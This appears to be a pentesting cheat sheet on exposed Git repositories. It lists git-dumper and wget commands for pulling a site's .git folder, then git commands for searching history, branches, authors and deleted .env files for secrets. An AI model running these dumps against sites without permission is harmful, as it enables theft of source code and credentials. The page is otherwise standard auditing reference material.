Appearance
๐งฐ Git Pentesting โ
๐ Resources โ
- git-dumper
- GitTools
- Gitleaks - Detecting passwords, API keys, tokens in git repositories.
๐ Git Dumping .git โ
bash
wget --mirror -I .git site.com/.git/bash
git-dumper http://site.com/.git/ /tmp/output๐ ๏ธ Extract datas โ
bash
# git-dumper
extractor.sh ./example ./new_example๐ Enumeration โ
๐ท๏ธ Tags / Branch โ
bash
# Tags / Branch
git tag
git tag -l
git show <tag>
git branch -a๐ Commit / Repo Information โ
bash
git show
git show <branch>
git show <commit>
git show <tag>
git --git-dir ./.git show
git config --list๐ History โ
bash
git log --all
git log --stat
git log -p # Show diff per commit
git rev-list --all # List all commits
git checkout <hash> # Detached HEAD or create branch for audit๐ Compare โ
bash
git diff [commit_id]
git diff --staged
git diff --cachedโป๏ธ Restore / Status โ
bash
git status
git restore <deleted_file>bash
git fsck --full --no-reflogs # List objects
git fsck --lost-found # Explore .git/lost-found/
git rev-list --objects --all | sort -k 2๐ต๏ธ Informations gathering โ
bash
git rev-list --objects --all | sort -k 2
git log --all --full-history -- "*.env"bash
git shortlog -sne --all # List all authors + emails
git remote -v # Detect exposed remotes
git reflog # Recover previous HEADs or commits
git ls-tree -r <branch> # List all files and their blob IDs